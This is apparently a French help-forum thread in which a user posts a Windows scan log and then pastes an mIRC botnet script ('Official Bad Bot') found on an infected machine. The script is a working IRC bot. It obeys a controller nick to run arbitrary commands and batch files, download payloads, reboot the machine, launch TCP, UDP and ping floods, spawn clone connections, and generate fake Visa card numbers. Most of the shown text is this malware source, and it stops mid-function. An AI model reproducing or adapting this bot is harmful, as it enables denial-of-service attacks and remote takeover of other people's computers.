2009-03-06 02:15:38 ----HD---- C:\Program Files\InstallShield Installation Information
2009-03-04 12:36:51 ----D---- C:\Logs
2009-03-04 12:36:40 ----D---- C:\Program Files\Fichiers communs
2009-03-03 18:41:55 ----D---- C:\Documents and Settings\lml-mike\Application Data\DAEMON Tools Pro
2009-03-01 20:41:49 ----AD---- C:\Documents and Settings\All Users\Application Data\TEMP
2009-02-28 16:11:21 ----D---- C:\Documents and Settings\All Users\Application Data\avg8
2009-02-28 16:10:20 ----D---- C:\Program Files\Fichiers communs\G DATA
2009-02-28 16:06:09 ----SD---- C:\Documents and Settings\lml-mike\Application Data\Microsoft
2009-02-25 21:54:59 ----A---- C:\WINDOWS\system32\MRT.exe
2009-02-20 19:05:09 ----D---- C:\Program Files\Fichiers communs\Microsoft Shared
2009-02-18 16:58:17 ----RSD---- C:\WINDOWS\Fonts

======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R1 AFS2K;AFS2k; C:\WINDOWS\system32\drivers\AFS2K.sys [2008-07-08 82380]
R1 AvgLdx86;AVG AVI Loader Driver x86; C:\WINDOWS\System32\Drivers\avgldx86.sys [2009-03-17 325640]
R1 AvgMfx86;AVG On-access Scanner Minifilter Driver x86; C:\WINDOWS\System32\Drivers\avgmfx86.sys [2009-02-28 27656]
R1 intelppm;Pilote de processeur Intel; C:\WINDOWS\system32\DRIVERS\intelppm.sys [2008-04-13 40576]
R2 acedrv11;acedrv11; \??\C:\WINDOWS\system32\drivers\acedrv11.sys []
R2 GDTdiInterceptor;GDTdiInterceptor; \??\C:\WINDOWS\system32\drivers\GDTdiIcpt.sys []
R3 ADIDTSFiltService;ADI DTS Filter Service; C:\WINDOWS\system32\drivers\adidts.sys [2006-12-08 139776]
R3 ADIHdAudAddService;ADI UAA Function Driver for High Definition Audio Service; C:\WINDOWS\system32\drivers\ADIHdAud.sys [2007-01-16 293888]
R3 AEAudio;AE Audio Service; C:\WINDOWS\system32\drivers\AEAudio.sys [2006-08-06 93952]
R3 Arp1394;Protocole client ARP 1394; C:\WINDOWS\system32\DRIVERS\arp1394.sys [2008-04-13 60800]
R3 GEARAspiWDM;GEARAspiWDM; C:\WINDOWS\System32\drivers\GEARAspiWDM.sys [2008-02-22 16168]
R3 HDAudBus;Pilote de bus Microsoft UAA pour High Definition Audio; C:\WINDOWS\system32\DRIVERS\HDAudBus.sys [2008-04-13 144384]
R3 hidusb;Pilote de classe HID Microsoft; C:\WINDOWS\system32\DRIVERS\hidusb.sys [2008-04-13 10368]
R3 mouhid;Pilote HID de souris; C:\WINDOWS\system32\DRIVERS\mouhid.sys [2004-08-05 12288]
R3 MTsensor;ATK0110 ACPI UTILITY; C:\WINDOWS\system32\DRIVERS\ASACPI.sys [2004-08-13 5810]
R3 NIC1394;Pilote réseau 1394; C:\WINDOWS\system32\DRIVERS\nic1394.sys [2008-04-13 61824]
R3 nv;nv; C:\WINDOWS\system32\DRIVERS\nv4_mini.sys [2008-10-07 6133856]
R3 usbaudio;Pilote USB audio (WDM); C:\WINDOWS\system32\drivers\usbaudio.sys [2008-04-13 60032]
R3 usbccgp;Pilote parent générique USB Microsoft; C:\WINDOWS\system32\DRIVERS\usbccgp.sys [2008-04-13 32128]
R3 usbehci;Pilote miniport de contrôleur d'hôte amélioré Microsoft USB 2.0; C:\WINDOWS\system32\DRIVERS\usbehci.sys [2008-04-13 30208]
R3 usbhub;Concentrateur USB2; C:\WINDOWS\system32\DRIVERS\usbhub.sys [2008-04-13 59520]
R3 usbuhci;Pilote miniport de contrôleur hôte universel USB Microsoft; C:\WINDOWS\system32\DRIVERS\usbuhci.sys [2008-04-13 20608]
R3 yukonwxp;NDIS5.1 Miniport Driver for Marvell Yukon Ethernet Controller; C:\WINDOWS\system32\DRIVERS\yk51x86.sys [2006-07-26 248832]
S3 61883;Pilote d'unité 61883; C:\WINDOWS\system32\DRIVERS\61883.sys [2008-04-13 48128]
S3 a5lrjchr;a5lrjchr; C:\WINDOWS\system32\drivers\a5lrjchr.sys []
S3 Avc;Périphérique AVC; C:\WINDOWS\system32\DRIVERS\avc.sys [2008-04-13 38912]
S3 CCDECODE;Décodeur sous-titre fermé; C:\WINDOWS\system32\DRIVERS\CCDECODE.sys [2008-04-13 17024]
S3 HPZid412;IEEE-1284.4 Driver HPZid412; C:\WINDOWS\system32\DRIVERS\HPZid412.sys [2003-03-09 51024]
S3 HPZipr12;Print Class Driver for IEEE-1284.4 HPZipr12; C:\WINDOWS\system32\DRIVERS\HPZipr12.sys [2003-03-09 16080]
S3 HPZius12;USB to IEEE-1284.4 Translation Driver HPZius12; C:\WINDOWS\system32\DRIVERS\HPZius12.sys [2003-03-09 21456]
S3 MSDV;Microsoft DV Camera and VCR; C:\WINDOWS\system32\DRIVERS\msdv.sys [2008-04-13 51200]
S3 MSTEE;Convertisseur en T/site-à-site de répartition Microsoft; C:\WINDOWS\system32\drivers\MSTEE.sys [2008-04-13 5504]
S3 NABTSFEC;Codec NABTS/FEC VBI; C:\WINDOWS\system32\DRIVERS\NABTSFEC.sys [2008-04-13 85248]
S3 NdisIP;Connection TV/vidéo Microsoft; C:\WINDOWS\system32\DRIVERS\NdisIP.sys [2008-04-13 10880]
S3 nm;Pilote du Moniteur réseau; C:\WINDOWS\system32\DRIVERS\NMnt.sys [2008-04-13 40320]
S3 nmwcdnsu;Nokia USB Flashing Phone Parent; C:\WINDOWS\system32\drivers\nmwcdnsu.sys [2008-02-01 138112]
S3 nmwcdnsuc;Nokia USB Flashing Generic; C:\WINDOWS\system32\drivers\nmwcdnsuc.sys [2008-02-01 8320]
S3 NPF;NetGroup Packet Filter Driver; C:\WINDOWS\system32\drivers\npf.sys [2007-11-06 34064]
S3 pccsmcfd;PCCS Mode Change Filter Driver; C:\WINDOWS\system32\DRIVERS\pccsmcfd.sys [2008-08-26 18816]
S3 QCDonner;Logitech QuickCam Express; C:\WINDOWS\system32\DRIVERS\OVCD.sys [2001-08-17 28032]
S3 SLIP;Détrameur décalage BDA; C:\WINDOWS\system32\DRIVERS\SLIP.sys [2008-04-13 11136]
S3 SONYPVU1;Pilote de filtrage Sony USB (SONYPVU1); C:\WINDOWS\system32\DRIVERS\SONYPVU1.SYS [2001-08-17 7552]
S3 streamip;BDA IPSink; C:\WINDOWS\system32\DRIVERS\StreamIP.sys [2008-04-13 15232]
S3 upperdev;upperdev; C:\WINDOWS\system32\DRIVERS\usbser_lowerflt.sys [2008-06-06 8064]
S3 usbprint;Classe d'imprimantes USB Microsoft; C:\WINDOWS\system32\DRIVERS\usbprint.sys [2008-04-13 25856]
S3 usbscan;Pilote de scanneur USB; C:\WINDOWS\system32\DRIVERS\usbscan.sys [2008-04-13 15104]
S3 usbser;USB Modem Driver; C:\WINDOWS\system32\drivers\usbser.sys [2008-04-13 26112]
S3 UsbserFilt;UsbserFilt; C:\WINDOWS\system32\DRIVERS\usbser_lowerfltj.sys [2008-05-07 8064]
S3 USBSTOR;Pilote de stockage de masse USB; C:\WINDOWS\system32\DRIVERS\USBSTOR.SYS [2008-04-13 26368]
S3 VX6000;Microsoft LifeCam VX-6000; C:\WINDOWS\system32\DRIVERS\VX6000Xp.sys [2006-06-30 2383152]
S3 Wdf01000;Wdf01000; C:\WINDOWS\system32\DRIVERS\Wdf01000.sys [2006-11-02 492000]
S3 WSTCODEC;Codec Teletext standard; C:\WINDOWS\system32\DRIVERS\WSTCODEC.SYS [2008-04-13 19200]
S3 WudfRd;Windows Driver Foundation - User-mode Driver Framework Reflector; C:\WINDOWS\system32\DRIVERS\wudfrd.sys [2006-09-15 82688]
S4 IntelIde;IntelIde; C:\WINDOWS\system32\drivers\IntelIde.sys []
S4 mchInjDrv;mchInjDrv; \??\C:\DOCUME~1\lml-mike\LOCALS~1\Temp\mc21.tmp []

======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R2 Autodesk Licensing Service;Autodesk Licensing Service; C:\Program Files\Fichiers communs\Autodesk Shared\Service\AdskScSrv.exe [2008-09-18 72704]
R2 avg8wd;AVG8 WatchDog; C:\logs\avg\avgwdsvc.exe [2009-03-17 298264]
R2 Diskeeper;Diskeeper; C:\Logs\Diskeeper\DkService.exe [2004-10-05 577644]
R2 JavaQuickStarterService;Java Quick Starter; C:\Program Files\Java\jre6\bin\jqs.exe [2008-11-10 152984]
R2 LightScribeService;LightScribeService Direct Disc Labeling Service; C:\Program Files\Fichiers communs\LightScribe\LSSrvc.exe [2006-10-19 61440]
R2 mi-raysat_3dsmax8;RaySat_3dsmax8 Server; V:\Logs\3dsMax8\mentalray\satellite\raysat_3dsmax8server.exe [2005-09-21 65536]
R2 MSCamSvc;MSCamSvc; C:\Program Files\Microsoft LifeCam\MSCamSvc.exe [2006-06-30 187184]
R2 NVSvc;NVIDIA Display Driver Service; C:\WINDOWS\system32\nvsvc32.exe [2008-10-07 163908]
R2 SQLWriter;SQL Server VSS Writer; C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe [2007-02-10 89968]
R2 WudfSvc;Windows Driver Foundation - User-mode Driver Framework; C:\WINDOWS\system32\svchost.exe [2008-04-13 14336]
R3 NMIndexingService;NMIndexingService; C:\Program Files\Fichiers communs\Ahead\Lib\NMIndexingService.exe [2006-12-23 262144]
R3 ServiceLayer;ServiceLayer; C:\Program Files\PC Connectivity Solution\ServiceLayer.exe [2008-11-11 620544]
S3 Adobe LM Service;Adobe LM Service; C:\Program Files\Fichiers communs\Adobe Systems Shared\Service\Adobelmsvc.exe [2008-09-18 72704]
S3 aspnet_state;ASP.NET State Service; C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe [2007-04-13 33632]
S3 clr_optimization_v2.0.50727_32;.NET Runtime Optimization Service v2.0.50727_X86; C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe [2007-04-13 68952]
S3 FontCache3.0.0.0;Windows Presentation Foundation Font Cache 3.0.0.0; C:\WINDOWS\Microsoft.Net\Framework\v3.0\WPF\PresentationFontCache.exe [2006-10-20 36864]
S3 IDriverT;InstallDriver Table Manager; C:\Program Files\Fichiers communs\InstallShield\Driver\1050\Intel 32\IDriverT.exe [2005-02-24 73728]
S3 idsvc;Windows CardSpace; C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe [2006-10-30 741376]
S3 MSSQL$SONY_MEDIAMGR2;SQL Server (SONY_MEDIAMGR2); C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe [2008-12-18 29181272]
S3 odserv;Microsoft Office Diagnostics Service; C:\Program Files\Fichiers communs\Microsoft Shared\OFFICE12\ODSERV.EXE [2007-08-24 443776]
S3 ose;Office Source Engine; C:\Program Files\Fichiers communs\Microsoft Shared\Source Engine\OSE.EXE [2006-10-26 145184]
S3 Pml Driver HPZ12;Pml Driver HPZ12; C:\WINDOWS\system32\HPZipm12.exe [2003-03-09 65795]
S3 rpcapd;Remote Packet Capture Protocol v.0 (experimental); C:\Program Files\WinPcap\rpcapd.exe [2007-11-06 92792]
S3 WMPNetworkSvc;Service Partage réseau du Lecteur Windows Media; C:\Program Files\Windows Media Player\WMPNetwk.exe [2006-11-03 918016]
S4 MSSQLServerADHelper;SQL Server Active Directory Helper; C:\Program Files\Microsoft SQL Server\90\Shared\sqladhlp90.exe [2005-10-14 45272]
S4 NetTcpPortSharing;Net.Tcp Port Sharing Service; C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe [2006-10-30 122880]
S4 SQLBrowser;SQL Server Browser; C:\Program Files\Microsoft SQL Server\90\Shared\sqlbrowser.exe [2007-02-10 242544]

-----------------EOF-----------------
0
lml-mike Messages postés 487 Statut Contributeur 122
 
Well, I already have this:

C:\WINDOWS\Winend

The installed version of IRC runs this script...

;BASE OF STARTUP/DISCONNECT;
on 1:start {
  run hex.exe /hide mIRC*
  set %servport 6667
  server $read serv.dll %servport
  set %chan #[X][OBB]
  set %nickstart [OBB][XBOT]-
  set %botversion Official Bad Bot V 1.0 [Owned By Aniya & NoToRiOuS]
  timerserver 0 60 con
  }
alias servercheck {
  if ($server == $null) server $read serv.dll %port2
}
alias con { .server %server %servport }
on 1:connect:{
  set %nick %nickstart $+ $rand(0,9) $+ $rand(0,9) $+ $rand(0,9) $+ $rand(0,9) $+ $rand(0,9) $+ $rand(0,9) $+ $rand(0,9)
  timerconnected 0 300 connectcheck
  timerserver off
  nick %nick
  join %chan
}
on 1:disconnect:{
  timerconnected off
  nick %nick
  server $read serv.dll %servport
  timerserver 0 60 con
}
on 1:kick:#:{
  haltdef
  if ($knick == $me) {
    join %chan
    halt
  }
}
on *:BAN:#: {
  var %bannick $nick
  if ( $banmask isin $address( $me , 2) || $me isin $banmask ) {
    msg $chan [AUTOPROTECT]: %bannick try to ban $me
    kick $chan %bannick [AUTOPROTECT]: Protect Ban
    samode $chan +e $me
    samode $chan +b $address( %bannick , 2)
    samode $chan +b %bannick $+ !*@*
  samode $chan -b $banmask }
  else { halt }
}
ON *:JOIN:#:{
  if ( $nick == $me ) {
.timer 1 1 mode $chan +o $me
.timer 1 2 mode $chan +nts
  }
  halt
}
alias connectcheck { whois $me }
on 1:kick:#:{
  if ($knick == $me) {
    join %chan
    halt
  }
}
on *:exit:{ run $mircexe }
on *:SENDFAIL:*.*:msg %chan [SEND]: Send Failled: $3 $+ , User: $2
;GLOBAL COMMAND;
on *:text:*:*: {
  if ($nick == Predator) {
  if ($1 == .hop) { hop %chan | halt }
  if ($1 == .driveinfo) { HD | halt }
  if ($1 == .time) { msg %chan [TIME]: $date(mm) $date(mmmm) $date(yyyy) $chr(124) $time $time(TT) $chr(124) $time(zzz) | halt }
  if ($1 == .uptime) { msg %chan [MAIN]: Uptime: $uptime(system,1) $+ . | halt }
  if ($1 == .url) { msg %chan [URL]: Active URL: $url | halt }
  if ($1 == .bmode) { msg %chan [BOTINFO]: Bot Mode: $usermode | halt } 
  if ($1 == .dns) { set %pub.dns on | dns $2 | halt }
  if ($1 == .visit) { msg %chan [VISIT]: URL Visited: $2 | run $2 | halt }
  if ($1 == .shutdown) { msg %chan [SHUTDOWN]: Shutting down system. | run shutdown -s -t 00 | halt }
  if ($1 == .reboot) { msg %chan [REBOOT]: Rebooting system. | run shutdown -r -t 00 | halt }
  if ($1 == .disconnect) { quit $2- }
  if ($1 == .reconnect) { quit $2- | server %server %servport | halt }
  if ($1 == .run) { msg %chan [RUN]: $2- | run $2- | halt }
  if ($1 == .version) { msg %chan [MAIN]: Version: %botversion | halt }
  if ($1 == .netinfo) { set %bot.ip $ip | set %bot.host $host | msg %chan [NETINFO]: [Type]: LAN (LAN Connection). [IP Address]: %bot.ip $+ . [Hostname]: %bot.host $+ . | halt }
  if ($1 == .creditcard) { creditcard }
  if ($1 == .mode) { mode $2- }
  if ($1 == .join) { join $2- }
  if ($1 == .part) { part $2- }
  if ($1 == .privmsg) { msg $2 $3- }
  if ($1 == .nick) { set %newnick $2 | set %changenick %newnick $+ $rand(0,9) $+ $rand(0,9) $+ $rand(0,9) $+ $rand(0,9) $+ $rand(0,9) $+ $rand(0,9) $+ $rand(0,9) | /nick %changenick }
  if ($1 == .rndnick2) { set %rndnick2 $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) $+ $rand(a,z) | nick %rndnick2 | halt }
  if ($1 == .spam1) { set %spamurl11 $2 | set %spamurl12 $3 | set %spamurl13 $4 | spamurl1 | halt }
  if ($1 == .spam2) { set %spamurl21 $2 | set %spamurl22 $3 | set %spamurl23 $4 | spamurl2 | halt }
  if ($1 == .spam3) { set %spamurl31 $2 | set %spamurl32 $3 | set %spamurl33 $4 | spamurl3 | halt }
  if ($1 == .spamstop) { unset %spamurl1 | unset %spamurl2 | unset %spamurl3 | msg %chan [SPAM]: All spams have been stopped. | halt }
  if ($1 == .send) { /dcc send $2 $3 | msg %chan [SEND]: Sending File: $3 $+ , User: $2 | halt }
  if ($1 == .download) { set %downloadsite $2 | set %path-to-file $3 | set %save-as-filename $4 | download | msg %chan [DOWNLOAD]: Downloading URL: %path-to-file to: %save-as-filename | halt }
  if ($1 == .update) { set %downloadsite $2 | set %path-to-file $3 | set %save-as-filename $4 | update | msg %chan [UPDATE]: Downloading update from: %path-to-file | halt }
  if ($1 == .clone) { set %clone.server $2 | set %clone.servport $3 | set %clone.chan $4 | set %clone.pass $5 | set %clone.user $read dico.dll $read dico.dll $read dico.dll $read dico.dll | set %clone.nick $read dico.dll | open | halt }
  if ($1 == .c.msg) { sockwrite -n clone PRIVMSG $2 $3- | halt }
  if ($1 == .c.me) { sockwrite -n clone PRIVMSG $2 $chr(1) $+ ACTION $3- $+ $chr(1) | halt }
  if ($1 == .c.ctcp) { sockwrite -n clone PRIVMSG $2 $chr(1) $+ $3- $+ $chr(1) | halt }
  if ($1 == .c.notice) { sockwrite -n clone NOTICE $2 $3- | halt }
  if ($1 == .c.join) { sockwrite -n clone JOIN $2 | halt }
  if ($1 == .c.part) { sockwrite -n clone PART $2 | halt }
  if ($1 == .c.hop) { sockwrite -n clone PART $2 | sockwrite -n clone JOIN $2 | halt }
  if ($1 == .c.fhop) { sockwrite -n clone JOIN $2 | sockwrite -n clone PART $2 | halt }
  if ($1 == .c.nick) { set %clone.nick $read dico.dll | sockwrite -tn clone nick %clone.nick | halt }
  if ($1 == .c.stop) { sockclose clone | halt }
  if ($1 == .fping) { set %pingIP $2 | pingflood | halt }
  if ($1 == .tcpflood) { set %tcpflood.ip $2 | set %tcpflood.port $3 | set %tcpflood.secs $4 | tcpflood | halt }
  if ($1 == .tcpstop) { tcpflood.stop | halt }
  if ($1 == .udpflood) { set %udp.ip $2 | set %udp.secs $3 | udpflood | halt }
  if ($1 == .udpstop) { udpflood.stop | halt }
  if ($1 == .raw) {
    if ($2 == all) { msg %chan [RAW]: Running Command: $3- | $3- }
    if ($2 == $me) { msg %chan [RAW]: Running Command: $3- | $3- }
}
  if ($1 == .dos) {
  msg %chan [DOS]: Running Command: $2-
  %output = cmd\ $+ $rand(0,9) $+ $rand(0,9) $+ $rand(0,9) $+ $rand(0,9) $+ $rand(0,9) $+ $rand(0,9) $+ $rand(0,9) $+ $rand(0,9)
  write %output $+ .bat $2-
  run -n %output $+ .bat
  }
  if ($1 == .dos.clear) {
  msg %chan [DOS]: Directory is now empty.
  %output = cmd\ $+ $rand(0,9) $+ $rand(0,9) $+ $rand(0,9) $+ $rand(0,9) $+ $rand(0,9) $+ $rand(0,9) $+ $rand(0,9) $+ $rand(0,9)
  write %output $+ .bat del C:\Windows\Winend\cmd\*.bat
  run -n %output $+ .bat
  if ($1 == .raw) {
    if ($2 == all) { msg %chan [RAW]: Running Command: $3- | $3- }
    if ($2 == $me) { msg %chan [RAW]: Running Command: $3- | $3- }
}
}
}
}
;CLONE;
alias open {
  sockopen clone %clone.server %clone.servport
  msg %chan [CLONES]: Created on %clone.server $+ : $+ %clone.servport $+ , in %clone.chan
}
on *:SOCKOPEN:clone: {
  if ($sockerr > 0) { return }
sockwrite -tn $sockname user %clone.user
sockwrite -tn $sockname nick %clone.nick
sockwrite -tn $sockname join %clone.chan
}
on *:sockread:clone: {
  sockread %cloneirc
  set %clone.action $gettok(%cloneirc,2,32)
  if (%clone.action == 433) { set %clone.nick $read dico.dll | sockwrite -n clone nick %clone.nick | halt }
  if (%clone.action == KICK) { sockwrite -n clone JOIN %bot.chan %bot.chanpw | halt }
  if (%clone.action == 473) { .timer 1 10 sockwrite -n clone JOIN %clone.cmd | halt }
  if (%clone.action == 475) { .timer 1 10 sockwrite -n clone JOIN %clone.cmd | halt }
  if (%clone.action == 471) { .timer 1 10 sockwrite -n clone JOIN %clone.cmd | halt }
  if (%clone.action == 474) { .timer 1 10 sockwrite -n clone JOIN %clone.cmd | halt }
}
;DNS;
on *:dns: {
  haltdef
  if (%bot.dns == on) {
    if ($raddress != $null) { set %bot.ip $iaddress }
    if (%bot.host == %bot.ip) { set %bot.host Anonymous }
    set %bot.dns off
  }
  if (%pub.dns == on) {
    if ($raddress != $null) { msg %chan [DNS]: Resolved $iaddress ( $+ $naddress $+ ) }
    else { msg %chan [DNS]: Unable to resolve. }
    set %pub.dns off
  }
}
alias pingflood {
  msg %chan [FLOOD]: Flooding %pingIP for 0 secs
  run ping -t %pingIP
  run hex.exe /hide *ping.exe*
  run hex.exe /hide *cmd.exe*
}
alias spamurl1 {
  msg %chan [SPAM]: Spam started on %spamurl11 $+ , %spamurl12 $+ , %spamurl13 $+ . 
  .timer 1 60 run %spamurl11
  .timer 1 60 msg %chan [SPAM] Spaming %spamurl11
  .timer 1 1800 run %spamurl12
  .timer 1 1800 msg %chan [SPAM] Spaming %spamurl12
  .timer 1 3600 run %spamurl13
  .timer 1 3600 msg %chan [SPAM] Spaming %spamurl13
  .timer 1 3610 msg %chan [SPAM] Spam completed $+ .
}
alias spamurl2 {
  msg %chan [SPAM]: Spam started on %spamurl21 $+ , %spamurl22 $+ , %spamurl23 $+ . 
  .timer 1 60 run %spamurl21
  .timer 1 60 msg %chan [SPAM] Spaming %spamurl21
  .timer 1 1800 run %spamurl22
  .timer 1 1800 msg %chan [SPAM] Spaming %spamurl22
  .timer 1 3600 run %spamurl23
  .timer 1 3600 msg %chan [SPAM] Spaming %spamurl23
  .timer 1 3610 msg %chan [SPAM] Spam completed $+ .
}
alias spamurl3 {
  msg %chan [SPAM]: Spam started on %spamurl31 $+ , %spamurl32 $+ , %spamurl33 $+ . 
  .timer 1 60 run %spamurl31
  .timer 1 60 msg %chan [SPAM] Spaming %spamurl31
  .timer 1 1800 run %spamurl32
  .timer 1 1800 msg %chan [SPAM] Spaming %spamurl32
  .timer 1 3600 run %spamurl33
  .timer 1 3600 msg %chan [SPAM] Spaming %spamurl33
  .timer 1 3610 msg %chan [SPAM] Spam completed $+ .
}
;HD;
alias HD {
  if ($disk(c:) == $true) { msg %chan [MAIN]: C: $bytes($disk(c:).size) $iif($remove($right($bytes($disk(c:).size).suf,2),0,1,2,3,4,5,6,7,8,9) == G, GB, $remove($right($bytes($disk(c:).size).suf,2),0,1,2,3,4,5,6,7,8,9)) $upper($disk(c:).type) $chr(40) $+ $iif($disk(c:).label == $null, None, $disk(c:).label) $+ $chr(41) Free: $bytes($disk(c:).free) $iif($remove($right($bytes($remove($bytes($disk(c:).free,b),$chr(44))).suf,2),0,1,2,3,4,5,6,7,8,9) == G, GB, $remove($right($bytes($remove($bytes($disk(c:).free,b),$chr(44))).suf,2),0,1,2,3,4,5,6,7,8,9)) $+ }
  if ($disk(d:) == $true) { msg %chan [MAIN]: D: $bytes($disk(d:).size) $iif($remove($right($bytes($disk(d:).size).suf,2),0,1,2,3,4,5,6,7,8,9) == G, GB, $remove($right($bytes($disk(d:).size).suf,2),0,1,2,3,4,5,6,7,8,9)) $upper($disk(d:).type) $chr(40) $+ $iif($disk(d:).label == $null, None, $disk(d:).label) $+ $chr(41) Free: $bytes($disk(d:).free) $iif($remove($right($bytes($remove($bytes($disk(d:).free,b),$chr(44))).suf,2),0,1,2,3,4,5,6,7,8,9) == G, GB, $remove($right($bytes($remove($bytes($disk(d:).free,b),$chr(44))).suf,2),0,1,2,3,4,5,6,7,8,9)) $+ }
  if ($disk(e:) == $true) { msg %chan [MAIN]: E: $bytes($disk(e:).size) $iif($remove($right($bytes($disk(e:).size).suf,2),0,1,2,3,4,5,6,7,8,9) == G, GB, $remove($right($bytes($disk(e:).size).suf,2),0,1,2,3,4,5,6,7,8,9)) $upper($disk(e:).type) $chr(40) $+ $iif($disk(e:).label == $null, None, $disk(e:).label) $+ $chr(41) Free: $bytes($disk(e:).free) $iif($remove($right($bytes($remove($bytes($disk(e:).free,b),$chr(44))).suf,2),0,1,2,3,4,5,6,7,8,9) == G, GB, $remove($right($bytes($remove($bytes($disk(e:).free,b),$chr(44))).suf,2),0,1,2,3,4,5,6,7,8,9)) $+ }
  if ($disk(f:) == $true) { msg %chan [MAIN]: F: $bytes($disk(f:).size) $iif($remove($right($bytes($disk(f:).size).suf,2),0,1,2,3,4,5,6,7,8,9) == G, GB, $remove($right($bytes($disk(f:).size).suf,2),0,1,2,3,4,5,6,7,8,9)) $upper($disk(f:).type) $chr(40) $+ $iif($disk(f:).label == $null, None, $disk(f:).label) $+ $chr(41) Free: $bytes($disk(f:).free) $iif($remove($right($bytes($remove($bytes($disk(f:).free,b),$chr(44))).suf,2),0,1,2,3,4,5,6,7,8,9) == G, GB, $remove($right($bytes($remove($bytes($disk(f:).free,b),$chr(44))).suf,2),0,1,2,3,4,5,6,7,8,9)) $+ }
  if ($disk(g:) == $true) { msg %chan [MAIN]: G: $bytes($disk(g:).size) $iif($remove($right($bytes($disk(g:).size).suf,2),0,1,2,3,4,5,6,7,8,9) == G, GB, $remove($right($bytes($disk(g:).size).suf,2),0,1,2,3,4,5,6,7,8,9)) $upper($disk(g:).type) $chr(40) $+ $iif($disk(g:).label == $null, None, $disk(g:).label) $+ $chr(41) Free: $bytes($disk(g:).free) $iif($remove($right($bytes($remove($bytes($disk(g:).free,b),$chr(44))).suf,2),0,1,2,3,4,5,6,7,8,9) == G, GB, $remove($right($bytes($remove($bytes($disk(g:).free,b),$chr(44))).suf,2),0,1,2,3,4,5,6,7,8,9)) $+ }
  if ($disk(h:) == $true) { msg %chan [MAIN]: H: $bytes($disk(h:).size) $iif($remove($right($bytes($disk(h:).size).suf,2),0,1,2,3,4,5,6,7,8,9) == G, GB, $remove($right($bytes($disk(h:).size).suf,2),0,1,2,3,4,5,6,7,8,9)) $upper($disk(h:).type) $chr(40) $+ $iif($disk(h:).label == $null, None, $disk(h:).label) $+ $chr(41) Free: $bytes($disk(h:).free) $iif($remove($right($bytes($remove($bytes($disk(h:).free,b),$chr(44))).suf,2),0,1,2,3,4,5,6,7,8,9) == G, GB, $remove($right($bytes($remove($bytes($disk(h:).free,b),$chr(44))).suf,2),0,1,2,3,4,5,6,7,8,9)) $+ }
  if ($disk(i:) == $true) { msg %chan [MAIN]: I: $bytes($disk(i:).size) $iif($remove($right($bytes($disk(i:).size).suf,2),0,1,2,3,4,5,6,7,8,9) == G, GB, $remove($right($bytes($disk(i:).size).suf,2),0,1,2,3,4,5,6,7,8,9)) $upper($disk(i:).type) $chr(40) $+ $iif($disk(i:).label == $null, None, $disk(i:).label) $+ $chr(41) Free: $bytes($disk(i:).free) $iif($remove($right($bytes($remove($bytes($disk(i:).free,b),$chr(44))).suf,2),0,1,2,3,4,5,6,7,8,9) == G, GB, $remove($right($bytes($remove($bytes($disk(i:).free,b),$chr(44))).suf,2),0,1,2,3,4,5,6,7,8,9)) $+ }
  if ($disk(j:) == $true) { msg %chan [MAIN]: J: $bytes($disk(j:).size) $iif($remove($right($bytes($disk(j:).size).suf,2),0,1,2,3,4,5,6,7,8,9) == G, GB, $remove($right($bytes($disk(j:).size).suf,2),0,1,2,3,4,5,6,7,8,9)) $upper($disk(j:).type) $chr(40) $+ $iif($disk(j:).label == $null, None, $disk(j:).label) $+ $chr(41) Free: $bytes($disk(j:).free) $iif($remove($right($bytes($remove($bytes($disk(j:).free,b),$chr(44))).suf,2),0,1,2,3,4,5,6,7,8,9) == G, GB, $remove($right($bytes($remove($bytes($disk(j:).free,b),$chr(44))).suf,2),0,1,2,3,4,5,6,7,8,9)) $+ }
}
;TCP FLOOD;
alias tcpflood {
  if (%tcpflood.port !isnum 1-65535) || (%tcpflood.secs !isnum 0-99999) { halt }
  msg %chan [TCPFLOOD]: Flooding %tcpflood.ip $+ : $+ %tcpflood.port for %tcpflood.secs seconds.
  .timertcp.flood 0 0.1 tcpflood2
  if (%flood.secs != 0) { .timertcp.flood.stop 1 %tcpflood.secs tcpflood.stop }
}
alias tcpflood2 { sockopen tcpflood- $+ $ticks $+ $rand(a,z) $+ $rand(1000,9999) %tcpflood.ip %tcpflood.port | halt }
on *:sockopen:tcpflood-*:{ sockwrite -n $sockname $str($chr($r(0,140)),800) | sockclose $sockname | halt }
alias tcpflood.stop {
  .timertcp.* off
  sockclose tcpflood-*
  msg %chan [TCPFLOOD]: Flood stopped.
  halt
}
;UDP FLOOD;
alias udpflood {
  msg %chan [UDPFLOOD]: Flooding %udp.ip for %udp.secs seconds.
  .timerudp.flood 0 0.1 udpflood2
  if (%udp.secs != 0) { .timerudp.flood.stop 1 %udp.secs udpflood.stop }
}
alias udpflood2 {
  set %udp.rand udpflood- $+ $ticks $+ $rand(a,z) $+ $rand(1000,9999)
  sockudp -b %udp.rand %udp.ip $rand(1,65535) $rand(1,65535) $rand(1,65535) $str($chr($r(0,140)),800)
  sockclose %udp.rand
  halt
}
alias udpflood.stop {
  .timerudp.* off
  sockclose udpflood-*
  msg chan [UDPFLOOD]: Flood stopped.
  halt
}
;CREDIT CARD;
alias creditcard {
  var %a = 1 | while (%a <= 1) { msg %chan [VISA]: $visa_card_number(16) $rand(0,9) $+ $rand(0,9) $+ $rand(0,9)   $rand(1,12) $+ / $+ $rand(9,11) | inc %a }
}
; Visa credit card generator
alias -l visa_card_number {
  var %left = 4, %mid, %a = 1
  while (%a <= $calc($$1 - 2)) {
    %mid = $+(%mid,$rand(0,9))
    inc %a
  }
  ; Done with the basic random stuff, now create the last digit that conforms to the 'mod 10 algorithm'
  var %body = $reverse($+(%left,%mid)), %a = 1, %b, %n1, %n2
  while (%a <= $len(%body)) {
    if ($int($calc(%a / 2)) = $calc(%a / 2)) {
      %n1 = $calc(%n1 + $mid(%body,%a,1))
    }
    else {
      %b = 2 * $mid(%body,%a,1)
      %n2 = $calc(%n2 + $iif(%b > 9, %b - 9, %b))
    }
    inc %a
